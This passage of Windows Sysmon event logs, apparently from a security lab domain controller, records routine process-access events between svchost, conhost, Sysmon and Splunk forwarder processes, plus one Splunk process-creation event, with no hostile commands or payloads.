C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.253","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3761,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.253\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.253","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3762,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.253\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.253","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3763,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.253\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.253","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3764,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.253\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.253","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3765,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.253\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.253","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3766,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.253\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.253","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3767,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.253\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FFB-5F25-0000-0010E3B20500}\r\nTargetProcessId: 3916\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.253","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FFB-5F25-0000-0010E3B20500}","TargetProcessId":"3916","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:40","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:39","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3768,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:39.926\r\nProcessGuid: {41C8662E-1FFB-5F25-0000-0010E0B80500}\r\nProcessId: 3060\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nFileVersion: 8.0.2\r\nDescription: Remote Performance monitor using WMI\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-wmi.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:39.926","ProcessGuid":"{41C8662E-1FFB-5F25-0000-0010E0B80500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","FileVersion":"8.0.2","Description":"Remote Performance monitor using WMI","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-wmi.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT 